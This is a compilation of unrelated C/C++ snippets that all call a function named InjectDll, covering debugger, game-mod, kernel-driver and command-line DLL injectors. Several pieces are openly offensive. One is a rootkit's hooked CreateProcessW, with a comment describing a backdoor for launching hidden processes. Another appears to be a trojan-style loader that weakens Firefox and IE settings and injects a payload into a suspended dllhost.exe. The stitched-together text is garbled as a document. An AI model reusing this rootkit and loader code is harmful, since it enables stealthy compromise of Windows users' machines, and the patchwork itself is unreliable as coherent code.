BOOL InjectDllToOne(LPCTSTR szProc, int nMode, LPCTSTR szDllPath) { int i = 0, nLen = (int)_tcslen(szProc); DWORD dwPID = 0; HANDLE hSnapShot = INVALID_HANDLE_VALUE; PROCESSENTRY32 pe; BOOL bMore = FALSE; // check if ProcName or PID for(i = 0; i < nLen; i++) if( !_istdigit(szProc[i]) ) break; if( i == nLen ) // PID { dwPID = (DWORD)_tstol(szProc); if( nMode == INJECTION_MODE ) InjectDll(dwPID, szDllPath); else EjectDll(dwPID, szDllPath); } else // ProcName { // Get the snapshot of the system pe.dwSize = sizeof(PROCESSENTRY32); hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPALL, NULL); if( hSnapShot == INVALID_HANDLE_VALUE ) { _tprintf(L"InjectDllToOne() : CreateToolhelp32Snapshot() failed!!! [%d]", GetLastError()); return FALSE; } // find process bMore = Process32First(hSnapShot, &pe); for( ; bMore; bMore = Process32Next(hSnapShot, &pe) ) { dwPID = pe.th32ProcessID; // 시스템의 안정성을 위해서 // PID 가 100 보다 작은 시스템 프로세스에 대해서는 // DLL Injection 을 수행하지 않는다. if( dwPID < 100 ) continue; if( !_tcsicmp(pe.szExeFile, szProc) ) { if( nMode == INJECTION_MODE ) InjectDll(dwPID, szDllPath); else EjectDll(dwPID, szDllPath); } } CloseHandle(hSnapShot); } return TRUE; }
BOOL InjectAllProcess(int nMode, LPCTSTR szDllPath) { DWORD dwPID = 0; HANDLE hSnapShot = INVALID_HANDLE_VALUE; PROCESSENTRY32 pe; // Get the snapshot of the system pe.dwSize = sizeof( PROCESSENTRY32 ); hSnapShot = CreateToolhelp32Snapshot( TH32CS_SNAPALL, NULL ); // find process Process32First(hSnapShot, &pe); do { dwPID = pe.th32ProcessID; // 시스템의 안정성을 위해서 // PID 가 100 보다 작은 시스템 프로세스에 대해서는 // DLL Injection 을 수행하지 않는다. if( dwPID < 100 ) continue; if( nMode == INJECTION_MODE ) InjectDll(dwPID, szDllPath); else EjectDll(dwPID, szDllPath); } while( Process32Next(hSnapShot, &pe) ); CloseHandle(hSnapShot); return TRUE; }
/*============================================================================ * windows MAIN */ int _tmain(int argc, _TCHAR* argv[]) { if( argc > 0 ) { return (int)InjectDll( (DWORD)_wtoi( argv[ 0 ] ) ); } return ERROR_INVALID_PARAMETER; }
/************************************** * Inject code into a remote process. * **************************************/ BOOL Inject() { #ifdef INJECT_DLL return (InjectDll() != 0); #else return (InjectCode() != 0); #endif }
bool DebugFrontend::InitializeBackend(const char* symbolsDirectory) { if (GetIsBeingDebugged(m_processId)) { MessageEvent("Error: The process cannot be debugged because it contains hooks from a previous session", MessageType_Error); return false; } char eventChannelName[256]; _snprintf(eventChannelName, 256, "Decoda.Event.%x", m_processId); char commandChannelName[256]; _snprintf(commandChannelName, 256, "Decoda.Command.%x", m_processId); // Setup communication channel with the process that is used to receive events // back to the frontend. if (!m_eventChannel.Create(eventChannelName)) { return false; } // Setup communication channel with the process that is used to send commands // to the backend. if (!m_commandChannel.Create(commandChannelName)) { return false; } // Inject our debugger DLL into the process so that we can monitor from // inside the process's memory space. if (!InjectDll(m_processId, "LuaInject.dll")) { MessageEvent("Error: LuaInject.dll could not be loaded into the process", MessageType_Error); return false; } // Wait for the client to connect. m_eventChannel.WaitForConnection(); // Read the initialization function from the event channel. if (!ProcessInitialization(symbolsDirectory)) { MessageEvent("Error: Backend couldn't be initialized", MessageType_Error); return false; } m_state = State_Running; // Start a new thread to handle the incoming event channel. DWORD threadId; m_eventThread = CreateThread(NULL, 0, StaticEventThreadProc, this, 0, &threadId); return true; }
// Backdoor : if application name or command line contains RTK_FILE_CHAR // the created process is *not* hooked. // Useful to launch hidden process from windows gui/cmd.exe that performs // a search before delegating the creation of the process to CreateProcess // To launch a non hijacked process using cmd, do the following : // run: cmd.exe // type: cmd.exe _nti (where _nti is RTK_FILE_CHAR ) // then run your hidden program from the non hijacked shell BOOL WINAPI MyCreateProcessW(LPCTSTR lpApplicationName, LPTSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCTSTR lpCurrentDirectory, LPSTARTUPINFO lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation) { int bResult, bInject=1; char msg[1024], cmdline[256], appname[256]; OutputString("[i] CreateProcessW()\n"); // do not rely on info given by HijackApi() since we may have hijacked at GetProcAddress() level if(!fCreateProcessW) { fCreateProcessW = (FARPROC) fGetProcAddress(GetModuleHandle("kernel32.dll"),"CreateProcessW"); if(!fCreateProcessW) return 0; } my_memset(msg, 0, 1024); my_memset(cmdline, 0, 256); my_memset(appname, 0, 256); //Convert strings from unicode : WideCharToMultiByte(CP_ACP, 0,(const unsigned short *)lpApplicationName, -1, appname, 255,NULL, NULL); WideCharToMultiByte(CP_ACP, 0,(const unsigned short *)lpCommandLine, -1, cmdline, 255,NULL, NULL); OutputString("\n[!!] Hooked CreateProcessW : %s - %s, injecting rootkit (%s)...\n", (char*)appname, (char*)cmdline, (char*)kNTIDllPath); bResult = (int) fCreateProcessW((const unsigned short *)lpApplicationName, (unsigned short *)lpCommandLine, lpProcessAttributes, lpThreadAttributes, bInheritHandles, CREATE_SUSPENDED /*dwCreationFlags*/, lpEnvironment, (const unsigned short *)lpCurrentDirectory, (struct _STARTUPINFOW *)lpStartupInfo, lpProcessInformation); // inject the created process if its name & command line doesn't contain RTK_FILE_CHAR if(bResult) { if(lpCommandLine) { if(strstr((char*)cmdline,(char*)RTK_FILE_CHAR)){ OutputString("\n[i] CreateProcessW: Giving true sight to process '%s'...\n", (char*)appname); WakeUpProcess(lpProcessInformation->dwProcessId); bInject = 0; } } if(lpApplicationName) { if(strstr((char*)appname,(char*)RTK_FILE_CHAR)) { OutputString("\n[i] CreateProcessW: Giving true sight to process '%s'...\n", (char*)appname); WakeUpProcess(lpProcessInformation->dwProcessId); bInject = 0; } } if(bInject) InjectDll(lpProcessInformation->hProcess, (char*)kNTIDllPath); CloseHandle(lpProcessInformation->hProcess); CloseHandle(lpProcessInformation->hThread); } return bResult; }
NTSTATUS DriverDispatch(PDEVICE_OBJECT DeviceObject,PIRP irp) { PIO_STACK_LOCATION io; PINJECT_INFO InjectInfo; NTSTATUS status; io=IoGetCurrentIrpStackLocation(irp); irp->IoStatus.Information=0; switch(io->MajorFunction) { case IRP_MJ_CREATE: status=STATUS_SUCCESS; break; case IRP_MJ_CLOSE: status=STATUS_SUCCESS; break; case IRP_MJ_READ: status=STATUS_SUCCESS; break; case IRP_MJ_WRITE: InjectInfo=(PINJECT_INFO)MmGetSystemAddressForMdlSafe(irp->MdlAddress,NormalPagePriority); if(!InjectInfo) { status=STATUS_INSUFFICIENT_RESOURCES; break; } if(!InjectDll(InjectInfo)) { status=STATUS_UNSUCCESSFUL; break; } status=STATUS_SUCCESS; irp->IoStatus.Information=sizeof(INJECT_INFO); break; default: status=STATUS_INVALID_DEVICE_REQUEST; break; } irp->IoStatus.Status=status; IoCompleteRequest(irp,IO_NO_INCREMENT); return status; }
int _tmain(int argc,TCHAR *argv[]) { if (argc != 3) { _tprintf(L"USAGE:%s pid dll_path\n",argv[0]); return 1; } // inject dll if (InjectDll((DWORD)_tstol(argv[1]), argv[2])) _tprintf(L"InjectDll(\"%s\") success!\n",argv[2]); else _tprintf(L"InjectDll(\"%s\") failed!\n", argv[2]); return 0; }
NTSTATUS DriverDispatch(PDEVICE_OBJECT DeviceObject,PIRP Irp) { PIO_STACK_LOCATION io; PINJECT_INFO InjectInfo; NTSTATUS Status = STATUS_SUCCESS; PIO_STACK_LOCATION IrpSp; PVOID InputBuffer = NULL; PVOID OutputBuffer = NULL; ULONG_PTR InputSize = 0; ULONG_PTR OutputSize = 0; ULONG_PTR IoControlCode = 0; IrpSp = IoGetCurrentIrpStackLocation(Irp); InputBuffer = OutputBuffer = Irp->AssociatedIrp.SystemBuffer; InputSize = IrpSp->Parameters.DeviceIoControl.InputBufferLength; OutputSize = IrpSp->Parameters.DeviceIoControl.OutputBufferLength; IoControlCode = IrpSp->Parameters.DeviceIoControl.IoControlCode; switch(IoControlCode) { case CTL_KEINJECTAPC: InjectInfo=(PINJECT_INFO)InputBuffer; if(!InjectInfo) { Status=STATUS_INSUFFICIENT_RESOURCES; break; } if(!InjectDll(InjectInfo)) { Status=STATUS_UNSUCCESSFUL; break; } Status=STATUS_SUCCESS; Irp->IoStatus.Information=0; break; default: Status=STATUS_INVALID_DEVICE_REQUEST; break; } Irp->IoStatus.Status=Status; IoCompleteRequest(Irp,IO_NO_INCREMENT); return Status; }
// command for inject button void CdllInjectDoc::InjectSelected(CListCtrl* lv, LPSTR szDllName) { POSITION pos = lv->GetFirstSelectedItemPosition(); int index = 0; TCHAR pid[21]; TCHAR cPid[21] = {0}; DWORD dwPid; while((index = lv->GetNextSelectedItem(pos)) != -1) { memcpy_s(pid, 21, cPid, 21); lv->GetItemText(index, 1, pid, 20); dwPid = _ttoi(pid); TCHAR exeFile[MAX_PATH]; lv->GetItemText(index, 0, exeFile, MAX_PATH); TCHAR line[260]; _stprintf_s(line, 260, _T("Injecting %s(%s)... "), exeFile, pid); writeLog(CString(line)); CString temp; temp.Append(exeFile); temp += _T("|"); temp.Append(pid); temp += _T("|"); int aa = pidInfo.Find(temp, 0); if (pidInfo.Find(temp, 0) != -1) { writeLog(CString("Already Injected.\r\n")); continue; } if (InjectDll(dwPid, szDllName) == TRUE) { writeLog(CString("SUCCEED.\r\n")); pidInfo += temp; } else writeLog(CString("FAILED.\r\n")); } }
int _tmain(int argc, _TCHAR* argv[]) { // 提升权限 EnablePrivilege(TRUE); // 打开进程 HWND hwnd = FindWindow(_T("BASE"), _T("搶曽嵁庫揱丂乣 Legacy of Lunatic Kingdom. ver 1.00b")); // 日文编码就是这样... DWORD pid; GetWindowThreadProcessId(hwnd, &pid); HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid); if (process == NULL) { printf("打开进程失败,错误代码:%u\n", GetLastError()); return 1; } // 要将TH15Render.dll放在本程序当前目录下 TCHAR dllPath[MAX_PATH]; // 要用绝对路径 GetCurrentDirectory(_countof(dllPath), dllPath); _tcscat_s(dllPath, _T("\\TH15Render.dll")); // 注入DLL HMODULE remoteModule = InjectDll(process, dllPath); if (remoteModule == NULL) { CloseHandle(process); return 2; } // 暂停 printf("按回车卸载DLL\n"); getchar(); // 卸载DLL if (!FreeRemoteDll(process, remoteModule)) { CloseHandle(process); return 3; } // 关闭进程 CloseHandle(process); return 0; }
int main(int argc, char *argv[]) { SetPrivilege(SE_DEBUG_NAME, TRUE); // InjectDll.exe <PID> <dllpath> if( argc != 3 ) { printf("Ó÷¨ : %s <½ø³ÌPID> <dll·¾¶>/n", argv[0]); return 1; } if( !InjectDll((DWORD)atoi(argv[1]), argv[2]) ) { printf("InjectDllµ÷ÓÃʧ°Ü£¡/n"); return 1; } printf("InjectDllµ÷Óóɹ¦£¡/n"); return 0; }
int _tmain(int argc, TCHAR* argv[]) { if( argc != 4 ) { usage(); return 1; } // adjust privilege _EnableNTPrivilege(SE_DEBUG_NAME, SE_PRIVILEGE_ENABLED); // InjectDll.exe <i|e> <PID> <dll_path> if( !_tcsicmp(argv[1], L"i") ) InjectDll((DWORD)_tstoi(argv[2]), argv[3]); else if(!_tcsicmp(argv[1], L"e") ) EjectDll((DWORD)_tstoi(argv[2]), argv[3]); return 0; }
BOOL InjectDllToAll(int nMode, LPCTSTR szDllPath) { DWORD dwPID = 0; HANDLE hSnapShot = INVALID_HANDLE_VALUE; PROCESSENTRY32 pe; BOOL bMore = FALSE; // Get the snapshot of the system pe.dwSize = sizeof(PROCESSENTRY32); hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPALL, NULL); if( hSnapShot == INVALID_HANDLE_VALUE ) { _tprintf(L"InjectDllToAll() : CreateToolhelp32Snapshot() failed!!! [%d]", GetLastError()); return FALSE; } // find process bMore = Process32First(hSnapShot, &pe); for( ; bMore; bMore = Process32Next(hSnapShot, &pe) ) { dwPID = pe.th32ProcessID; // 예외 프로세스 : [System Process], System, smss.exe, csrss.exe if( dwPID < 100 || !_tcsicmp(pe.szExeFile, L"smss.exe") || !_tcsicmp(pe.szExeFile, L"csrss.exe") ) { _tprintf(L"%s(%d) => System Process... DLL %s is impossible!\n", pe.szExeFile, dwPID, nMode==INJECTION_MODE ? L"Injection" : L"Ejection"); continue; } if( nMode == INJECTION_MODE ) InjectDll(dwPID, szDllPath); else EjectDll(dwPID, szDllPath); } CloseHandle(hSnapShot); return TRUE; }
void KInject::Inject2(HANDLE hProcess, HANDLE hThread){ DWORD ret; char szDLL[MAX_PATH]; //Intruder.dll full path // GetModuleFileNameA(0, szDLL, MAX_PATH); // for(DWORD i=(DWORD)strlen(szDLL); i>0; i--){if(szDLL[i-1]=='\\'){szDLL[i]=0; break;}} // strcat(szDLL, "intruder.dll"); strcpy(szDLL, "C:\\apilog\\intruder.dll"); int len = strlen(szDLL) + 1; PVOID param = VirtualAllocEx(hProcess, NULL, len, MEM_COMMIT | MEM_TOP_DOWN, PAGE_READWRITE); if (param != NULL) { if (WriteProcessMemory(hProcess, param, (LPVOID)szDLL, len, &ret)) { InjectDll(hProcess, hThread, (DWORD)param); } } }
int _tmain(int argc, TCHAR *argv[]) { if( argc != 3) { _tprintf(L"USAGE : %s <pid> <dll_path>\n", argv[0]); return 1; } // change privilege if( !SetPrivilege(SE_DEBUG_NAME, TRUE) ) return 1; // inject dll if( InjectDll((DWORD)_tstol(argv[1]), argv[2]) ) _tprintf(L"InjectDll(\"%s\") success!!!\n", argv[2]); else _tprintf(L"InjectDll(\"%s\") failed!!!\n", argv[2]); return 0; }
BOOL CALLBACK EnumWindowsProc(HWND hwnd, LPARAM lParam) { switch (lParam) { case INJECT_DLL:{ if (getwindowtext(hwnd) == "Diablo II") { string path = getexepath(hwnd); if (path == "") MessageBox(hwnd, str_to_wstr("Could not get Diablo II exe path.\n" + error_code_to_text(GetLastError())).c_str(), L"ERROR", MB_OK); string exename = path.substr(path.rfind("\\") + 1, path.size() - path.rfind("\\")); if (exename == "Game.exe") { if (!isInjected(hwnd)) { if (!InjectDll(hwnd)) { MessageBox(hwnd, L"Injection failed", L"ERROR", MB_OK); break; } } } } break; } } return TRUE; }
static void Run() { SetFirefoxPrefs(); DisableMultiProcessesAndProtectedModeIe(); InitPanelRequest(); BYTE *mainPluginPe = NULL; GetDlls(&mainPluginPe, NULL, FALSE); char dllhostPath[MAX_PATH] = { 0 }; Funcs::pSHGetFolderPathA(NULL, CSIDL_SYSTEM, NULL, 0, dllhostPath); Funcs::pLstrcatA(dllhostPath, Strs::fileDiv); Funcs::pLstrcatA(dllhostPath, Strs::dllhostExe); STARTUPINFOA startupInfo = { 0 }; PROCESS_INFORMATION processInfo = { 0 }; startupInfo.cb = sizeof(startupInfo); Funcs::pCreateProcessA(dllhostPath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &startupInfo, &processInfo); InjectDll(mainPluginPe, processInfo.hProcess, FALSE); }
/* Función: InjectorDll Descripción: Proceso principal encargado de crear el nuevo proceso e e insertar en memoria del proceso cargado los datos necesarios para poder cargarse la dll especificada Parametros: program_name - Nombre del programa dll_name - Nombre de la dll Retorno: _ERROR__ - Fallo en alguno de los pasos del proceso _SUCCESS__ - Funcionamiento correcto del proceso */ int InjectorDll ( const char * dll_name, const char * typeapp, const char * program_name, DWORD pid ) { STARTUPINFO startup_info; PROCESS_INFORMATION pinfo; int return_function; char * debug_string; int type_of_app; DWORD create_flag; // Inicializacion de variables locales ZeroMemory( & startup_info , sizeof(startup_info) ); ZeroMemory( & pinfo, sizeof(pinfo) ); startup_info.cb = sizeof(startup_info); return_function = _SUCCESS__; // Controlamos si debemos lanzar el proceso o engancharnos a uno ya creado if ( program_name == NULL ) { // Nos enganchamos al proceso ya creado debug_string = "Open process"; pinfo.hProcess = OpenProcess( PROCESS_ALL_ACCESS, FALSE, pid ); if ( pinfo.hProcess == NULL ) { printf( " [FAIL] - %s\n", debug_string ); ShowGetLastErrorString( "InjectorDll:OpenProcess(pid)" ); return _ERROR__; } else { printf( "\n [OK] - Procces Attached [%04d].\n", pid ); } } else { // Mostramos los datos del programa ShowInjectorTask( program_name, dll_name ); // Checkeamos el tipo de programa if ( !strcmp( typeapp, "-c" ) ) type_of_app = _CONS_APP__; else if ( !strcmp( typeapp, "-g" ) ) type_of_app = _GUI_APP__; else if ( !strcmp( typeapp, "-u" ) ) type_of_app = GetTypeOfApp( ( LPTSTR ) program_name ); else return _ERROR__; if ( type_of_app == _CONS_APP__ ) { puts( " [OK] - CONSOLE." ); create_flag = CREATE_SUSPENDED | CREATE_NEW_CONSOLE; } else if ( type_of_app == _GUI_APP__ ) { puts( " [OK] - GUI" ); create_flag = 0; } else if ( type_of_app == _UNK_APP__ ) puts( " [OK] - UNKNOW" ); // Creamos el proceso en funcion del tipo de exe debug_string = "Create process"; if ( CreateProcess ( NULL , (LPTSTR) program_name , NULL , NULL , FALSE , create_flag , NULL , NULL , & startup_info , & pinfo ) == 0 ) { printf( " [FAIL] - %s\n", debug_string ); ShowGetLastErrorString( "InjectorDll:CreateProcess(program_name)" ); return _ERROR__; } // Mostramos los datos del proceso creado printf ( " [OK] - %s:\n" " [INFO] PID: 0x%04X\n" " [INFO] P. HANDLE: 0x%08X\n" " [INFO] TID: 0x%04X\n" " [INFO] T. HANDLE: 0x%08X\n" , debug_string , pinfo.dwProcessId , pinfo.hProcess , pinfo.dwThreadId , pinfo.hThread ); // Esperamos a la carga del proceso en memoria y en ese momento // suspendemos el hilo principal para poder trabajar con el sin problemas // en caso de que sea una aplicacion con ventanas if ( type_of_app == _GUI_APP__ ) { debug_string = " Waiting for process load."; if ( WaitForInputIdle( pinfo.hProcess, INFINITE ) == 0 ) { debug_string = "Suspension of remote main thread."; if ( SuspendThread( pinfo.hThread ) == -1 ) { printf( " [FAIL] - %s\n", debug_string ); ShowGetLastErrorString ( "InjectorDll:SuspendThread(_GUI_APP__)" ); return_function = _ERROR__; } else { printf( " [OK] - %s.\n", debug_string ); return_function == _SUCCESS__; } } else { printf( " [ERROR] - %s\n", debug_string ); ShowGetLastErrorString ( "InjectorDll:WaitForInputIdle(_GUI_APP__)" ); return_function = _ERROR__; } } } // Preparamos y inyectamos la carga de la DLL en el proceso indicado if ( return_function == _SUCCESS__ ) { puts( " [INFO] - Injecting DLL... " ); debug_string = " DLL injected."; if ( InjectDll( pinfo.hProcess, dll_name ) == _SUCCESS__ ) { printf( " [OK] - %s\n", debug_string ); } else { printf( " [FAIL] - %s\n", debug_string ); return_function = _ERROR__; } } // Controlamos los errores y si pasa algo terminamos el proceso remoto if ( return_function == _ERROR__ ) { debug_string = " Remote process ended due to an error."; if ( TerminateProcess( pinfo.hProcess, 0 ) == -1 ) { printf( " [FAIL] - %s\n", debug_string ); ShowGetLastErrorString ( "InjectorDll:TerminateProcess(program)" ); } else printf( " [OK] - %s.\n", debug_string ); } debug_string = " Injection ended:"; if ( return_function == _SUCCESS__ ) { printf ( "\n" " [OK] - %s\n" " Try to connect to port written in \n" " C:\\ph_listen_ports.log, syntax: PID-PORT\n" " Example: nc 127.0.0.1 1234 (1234 is the first default port)\n" , debug_string ); } else printf( "\n [FAIL] - %s\n", debug_string ); return return_function; }
BOOL WINAPI HookCreateProcessInternalW (HANDLE hToken, LPCWSTR lpApplicationName, LPWSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCWSTR lpCurrentDirectory, LPSTARTUPINFOW lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation, PHANDLE hNewToken) { BOOL ret = FALSE; LPWSTR lpfile = lpCommandLine; BOOL tohook = FALSE; if (lpApplicationName && wcslen(lpApplicationName)>1) { lpfile = (LPWSTR)lpApplicationName; } /* 禁止启动16位程序 */ if (dwCreationFlags&CREATE_SHARED_WOW_VDM || dwCreationFlags&CREATE_SEPARATE_WOW_VDM) { SetLastError(ERROR_INVALID_PARAMETER); return ret; } /* 存在不安全插件,注入保护 */ if ( stristrW(lpfile, L"SumatraPDF.exe") || stristrW(lpfile, L"java.exe") || stristrW(lpfile, L"jp2launcher.exe")) { /* 静态编译时,不能启用远程注入 */ #if !defined(LIBPORTABLE_STATIC) dwCreationFlags |= CREATE_SUSPENDED; tohook = TRUE; #endif } /* 如果启用白名单制度(严格检查) */ else if ( read_appint(L"General",L"EnableWhiteList") > 0 ) { if ( !in_whitelist((LPCWSTR)lpfile) ) { #ifdef _LOGDEBUG logmsg("the process %ls disabled-runes\n",lpfile); #endif SetLastError( TrueRtlNtStatusToDosError(STATUS_ERROR) ); return ret; } } else if ( in_whitelist((LPCWSTR)lpfile) ) { ; } /* 如果不存在于白名单,则自动阻止命令行程序启动 */ else { if ( ProcessIsCUI(lpfile) ) { #ifdef _LOGDEBUG logmsg("%ls process, disabled-runes\n",lpfile); #endif SetLastError( TrueRtlNtStatusToDosError(STATUS_ERROR) ); return ret; } } ret = TrueCreateProcessInternalW(hToken,lpApplicationName,lpCommandLine,lpProcessAttributes, lpThreadAttributes,bInheritHandles,dwCreationFlags,lpEnvironment,lpCurrentDirectory, lpStartupInfo,lpProcessInformation,hNewToken); if ( ret && tohook ) { #ifdef _LOGDEBUG logmsg("InjectDll run .\n"); #endif InjectDll(lpProcessInformation); } return ret; }
void CdllInjectDoc::updateProcList(CListCtrl* lv, LPCTSTR imgName, LPSTR dllName) { // create Process Snapshot HANDLE hSnapshot; hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL); PROCESSENTRY32 pe = {sizeof(PROCESSENTRY32)}; // first snapshot Process32First(hSnapshot, &pe); // index, pid string int index = 0; TCHAR pid[20]; TCHAR emptyPid[20] = {0}; wsprintf(pid, _T("%d"), pe.th32ProcessID); // 1st, 2nd item text (exe file, pid) CString first, second; first = lv->GetItemText(0, 0); second = lv->GetItemText(0, 1); // update first process information if (pe.th32ProcessID != _ttoi(second.GetBuffer(0)) || _tcsicmp(pe.szExeFile, first.GetBuffer(0)) != 0) { lv->DeleteItem(0); index = lv->InsertItem(0, pe.szExeFile); lv->SetItem(index, 1, LVIF_TEXT, pid, 0, 0, 0, NULL); } // check automatic inject option if (imgName != NULL && _tcsicmp(imgName,pe.szExeFile) == 0) { InjectDll(pe.th32ProcessID, dllName); } // empty pid string //memcpy_s(pid, 20, emptyPid, 20); // insert next items int i = index + 1; // update next process informations while(Process32Next(hSnapshot, &pe) != FALSE) { first = lv->GetItemText(i, 0); second = lv->GetItemText(i, 1); // check automatic inject option if (imgName != NULL && _tcsicmp(imgName, pe.szExeFile) == 0) { // empty pid string memcpy_s(pid, 20, emptyPid, 20); _itot_s(pe.th32ProcessID, pid, 20, 10); CString temp; temp.Append(pe.szExeFile); temp += _T("|"); temp.Append(pid); temp += _T("|"); if (pidInfo.Find(temp, 0) != -1) { i++; continue; } TCHAR line[260]; _stprintf_s(line, 260, _T("Injecting %s(%d)... "), pe.szExeFile, pe.th32ProcessID); writeLog(CString(line)); if (InjectDll(pe.th32ProcessID, dllName) == TRUE) { writeLog(CString("SUCCEED.\r\n")); pidInfo += temp; } else writeLog(CString("FAILED.\r\n")); } // if already in listview, skip if (pe.th32ProcessID == _ttoi(second.GetBuffer(0)) && _tcsicmp(pe.szExeFile, first.GetBuffer(0)) == 0) { i++; continue; } // delete old process info, and inform that is exited & delete from injection list CString temp; temp = first + _T("|") + second + _T("|"); if (pidInfo.Find(temp) != -1) { CString output; output = _T("Process Exited: ") + first + _T("(") + second + _T(").") + _T("\r\n"); writeLog(output); pidInfo.Replace(temp, _T("")); } lv->DeleteItem(i); index = lv->InsertItem(i, pe.szExeFile); wsprintf(pid, _T("%d"), pe.th32ProcessID); lv->SetItem(index, 1, LVIF_TEXT, pid, 0, 0, 0, NULL); i++; } CloseHandle(hSnapshot); // if listcount is more than process list, delete records while (i < lv->GetItemCount()) { // delete old process info, and inform that is exited & delete from injection list first = lv->GetItemText(i, 0); second = lv->GetItemText(i, 1); CString temp; temp = first + _T("|") + second + _T("|"); if (pidInfo.Find(temp) != -1) { CString output; output = _T("Process Exited: ") + first + _T("(") + second + _T(").") + _T("\r\n"); writeLog(output); pidInfo.Replace(temp, _T("")); } lv->DeleteItem(i); i++; } }
NTSTATUS WINAPI HookNtCreateUserProcess(PHANDLE ProcessHandle,PHANDLE ThreadHandle, ACCESS_MASK ProcessDesiredAccess,ACCESS_MASK ThreadDesiredAccess, POBJECT_ATTRIBUTES ProcessObjectAttributes, POBJECT_ATTRIBUTES ThreadObjectAttributes, ULONG CreateProcessFlags, ULONG CreateThreadFlags, PRTL_USER_PROCESS_PARAMETERS ProcessParameters, PVOID CreateInfo, PNT_PROC_THREAD_ATTRIBUTE_LIST AttributeList) { RTL_USER_PROCESS_PARAMETERS mY_ProcessParameters; PROCESS_INFORMATION ProcessInformation; NTSTATUS status; BOOL tohook = FALSE; fzero(&mY_ProcessParameters,sizeof(RTL_USER_PROCESS_PARAMETERS)); if ( stristrW(ProcessParameters->ImagePathName.Buffer, L"SumatraPDF.exe") || stristrW(ProcessParameters->ImagePathName.Buffer, L"java.exe") || stristrW(ProcessParameters->ImagePathName.Buffer, L"jp2launcher.exe")) { tohook = TRUE; } else if ( read_appint(L"General",L"EnableWhiteList") > 0 ) { if ( ProcessParameters->ImagePathName.Length > 0 && in_whitelist((LPCWSTR)ProcessParameters->ImagePathName.Buffer) ) { #ifdef _LOGDEBUG logmsg("the process %ls in whitelist\n",ProcessParameters->ImagePathName.Buffer); #endif } else { #ifdef _LOGDEBUG logmsg("the process %ls disabled-runes\n",ProcessParameters->ImagePathName.Buffer); #endif ProcessParameters = &mY_ProcessParameters; } } else if ( in_whitelist((LPCWSTR)ProcessParameters->ImagePathName.Buffer) ) { ; } else { if ( !IsGUI((LPCWSTR)ProcessParameters->ImagePathName.Buffer) ) ProcessParameters = &mY_ProcessParameters; } status = TrueNtCreateUserProcess(ProcessHandle, ThreadHandle, ProcessDesiredAccess, ThreadDesiredAccess, ProcessObjectAttributes, ThreadObjectAttributes, CreateProcessFlags, CreateThreadFlags, ProcessParameters, CreateInfo, AttributeList); if ( NT_SUCCESS(status)&&tohook) { ULONG Suspend = 0; fzero(&ProcessInformation,sizeof(PROCESS_INFORMATION)); ProcessInformation.hProcess = *ProcessHandle; ProcessInformation.hThread = *ThreadHandle; /* when tcmalloc enabled or MinGW compile time,InjectDll crash on win8/8.1 */ #if !defined(ENABLE_TCMALLOC) && !defined(__GNUC__) && !defined(LIBPORTABLE_STATIC) if ( NT_SUCCESS(TrueNtSuspendThread(ProcessInformation.hThread,&Suspend)) ) { #ifdef _LOGDEBUG logmsg("NtInjectDll() run .\n"); #endif InjectDll(&ProcessInformation); } #endif } return status; }